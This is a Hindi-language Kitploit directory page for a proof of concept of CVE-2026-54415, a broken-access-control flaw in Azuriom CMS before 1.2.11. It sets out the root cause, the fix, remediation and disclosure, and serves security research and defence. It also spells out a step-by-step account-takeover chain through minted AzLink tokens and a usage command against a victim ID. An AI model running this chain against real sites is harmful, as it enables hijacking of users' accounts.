Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-54415-PoC — CVE-2026-54415 के लिए PoC — Azuriom CMS (<1.2.11) भंग एक्सेस नियंत्रण → खाता अधिग्रहण | Kitploit
उपकरण/GitHubGitHub/abdugafforov-bobur/cve-2026-54415-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubabdugafforov-bobur/cve-2026-54415-poc

CVE-2026-54415-PoC

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-54415 के लिए PoC — Azuriom CMS (<1.2.11) भंग एक्सेस नियंत्रण → खाता अधिग्रहण

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-54415 — Azuriom CMS में टूटा एक्सेस नियंत्रण → खाता अधिग्रहण

Azuriom CMS < 1.2.11 में एडमिन सर्वर-प्रबंधन रूट्स पर अनधिकृत एक्सेस (Missing authorization) के कारण, कोई भी निम्न-विशेषाधिकार वाला एडमिन (जिसके पास केवल admin.access है) AzLink सर्वर टोकन बना सकता है और किसी भी गैर-एडमिन खाते को अपने कब्ज़े में ले सकता है।

CVECVE-2026-54415
उत्पादAzuriom CMS
प्रभावित< 1.2.11
सुधार1.2.11 — कमिट 4b744bc
CWECWE-862 (Missing Authorization), CWE-269 (Improper Privilege Management)
CVSS 3.18.1 High — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
CVSS 4.08.6 High — AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

यह PoC एक पैच किए गए संस्करण के विरुद्ध रक्षात्मक और शैक्षिक उद्देश्यों के लिए प्रकाशित किया गया है। इसे केवल उन्हीं सिस्टमों पर चलाएँ जिनके आप स्वामी हैं या जिनका परीक्षण करने के लिए आपको स्पष्ट रूप से अधिकृत किया गया है। Azuriom 1.2.11+ में अपग्रेड करें।

✅ स्थानीय Azuriom 1.2.10 इंस्टेंस के विरुद्ध एंड-टू-एंड सत्यापित — एक्सेस-नियंत्रण बाईपास, टोकन मिंटिंग, पुष्ट पासवर्ड परिवर्तन + पीड़ित लॉगिन, और एडमिन-सुरक्षा सीमा।


मूल कारण (Root cause)

routes/admin.php में पूरा एडमिन पैनल एक ही can:admin.access ग्रुप द्वारा गेटेड है, और प्रत्येक संवेदनशील फीचर से अपना स्वयं का विस्तृत can:admin.* मिडलवेयर जोड़े जाने की अपेक्षा की जाती है। 1.2.11 से पहले, सर्वर-प्रबंधन रूट्स ऐसे किसी भी मिडलवेयर के बिना शिप किए गए थे:

root@kitploit:~
// routes/admin.php (vulnerable, < 1.2.11)
Route::resource('servers', ServerController::class)->except('show');
Route::post('/servers/{server}/verify/azlink', [ServerController::class, 'verifyAzLink'])->name('servers.verify-azlink');
Route::post('/servers/default', [ServerController::class, 'changeDefault'])->name('servers.change-default');

कोई भी उपयोगकर्ता जो एडमिन पैनल तक पहुँच सकता है (admin.access), सर्वर बना सकता है। admin.servers अनुमति बिल्कुल भी मौजूद नहीं थी — इसका अस्तित्व केवल फिक्स के बाद आया।

फिक्स (1.2.11)

विक्रेता ने एक नई admin.servers अनुमति बनाई और रूट्स को उसमें लपेट दिया:

root@kitploit:~
// routes/admin.php (fixed, 1.2.11)
Route::middleware('can:admin.servers')->group(function () {
    Route::resource('servers', ServerController::class)->except('show');
    Route::post('/servers/{server}/verify/azlink', [ServerController::class, 'verifyAzLink'])->name('servers.verify-azlink');
    Route::post('/servers/default', [ServerController::class, 'changeDefault'])->name('servers.change-default');
});

उसी कमिट ने social-links और pages/posts.attachments रूट्स में पहले से लापता अनुमति जाँचों को भी जोड़ा।


सर्वर बनाना = खाता अधिग्रहण क्यों है

सर्वर बनाने पर 32-अक्षर का सर्वर टोकन उत्पन्न होता है (app/Http/Controllers/Admin/ServerController.php):

root@kitploit:~
$server = new Server([...$request->validated(), 'token' => Str::random(32), ...]);

यह टोकन AzLink API (routes/api.php) को प्रमाणित करता है, जिसका VerifyServerToken मिडलवेयर वैध Azuriom-Link-Token हेडर वाले किसी भी अनुरोध पर भरोसा करता है। AzLink खाता-प्रबंधन एंडपॉइंट्स उजागर करता है:

root@kitploit:~
POST /api/azlink/password   → change a user's password by game_id
POST /api/azlink/email      → change a user's email by game_id
POST /api/azlink/register   → create users
POST /api/azlink/user/{id}/money/{add,remove,set}

updatePassword केवल तब मना करता है जब लक्ष्य isAdmin() हो — हर गैर-एडमिन खाता अधिग्रहण योग्य है:

root@kitploit:~
public function updatePassword(Request $request) {
    // validates game_id + password
    $user = User::where('game_id', $request->input('game_id'))->firstOrFail();
    if ($user->isAdmin()) { return response()->noContent(); }   // only admins are protected
    $user->update(['password' => $request->input('password')]);
    ...
}

टोकन के लिए किसी सुलभ गेम सर्वर की आवश्यकता नहीं

सर्वर निर्माण सहेजने से पहले $server->bridge()->verifyLink() को कॉल करता है। mc-azlink प्रकार के लिए यह बिना शर्त सत्य होता है:

root@kitploit:~
// app/Games/Minecraft/Servers/AzLink.php
public function verifyLink(): bool { return true; }

इसलिए हमलावर कोई भी डमी address देता है, सर्वर फिर भी सहेज लिया जाता है, और नया टोकन AzLink सेटअप कमांड (/azlink setup <url> <token>) के अंदर पैनल में वापस प्रदर्शित होता है।


एक्सप्लॉइट श्रृंखला

root@kitploit:~
1. Authenticate as a low-priv admin  (only admin.access — NO admin.servers, which didn't exist)
2. POST /admin/servers   name=x&type=mc-azlink&address=127.0.0.1   → server saved, token minted
3. GET  /admin/servers/{id}/edit                                   → read token from setup command
4. POST /api/azlink/password   (header Azuriom-Link-Token: <token>)  game_id=<victim>&password=<new>
5. Log in as the victim                                            → full account takeover

उपयोग

root@kitploit:~
python3 poc.py \
  --url https://target.example \
  --admin-user lowpriv_admin --admin-pass 'password' \
  --victim-game-id 1001 \
  --new-password 'Pwn3d!TakenOver'

स्क्रिप्ट लॉगिन करती है, एक सर्वर टोकन मिंट करती है, उसे निकालती है, AzLink के माध्यम से पीड़ित का पासवर्ड रीसेट करती है, और टोकन + परिणाम प्रिंट करती है। सभी फ्लैग के लिए poc.py --help देखें। requests आवश्यक है (pip install requests)।


निवारण

  • Azuriom 1.2.11 या उसके बाद के संस्करण में अपग्रेड करें।
  • admin_servers का ऑडिट करें और किसी भी अप्रत्याशित सर्वर टोकन को रद्द करें।
  • न्यूनतम विशेषाधिकार लागू करें: ऑडिट करें कि किन भूमिकाओं के पास admin.access है।

प्रकटीकरण

  • शोधकर्ता / सूचना देने वाले: Bobur Abdugafforov (@abdugafforov-bobur)
  • CNA द्वारा निर्दिष्ट: TuranSec
  • प्रकाशित: 2026-06-17
  • विक्रेता द्वारा 1.2.11 में सुधारित

संदर्भ

  • फिक्स कमिट: https://github.com/Azuriom/Azuriom/commit/4b744bc0dd11f205f5aa053c6db8a949d3f0608e
  • रिलीज़: https://github.com/Azuriom/Azuriom/releases/tag/v1.2.11
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-54415

लाइसेंस

MIT — केवल अधिकृत सुरक्षा परीक्षण और शोध के लिए।

टूल डाउनलोड करें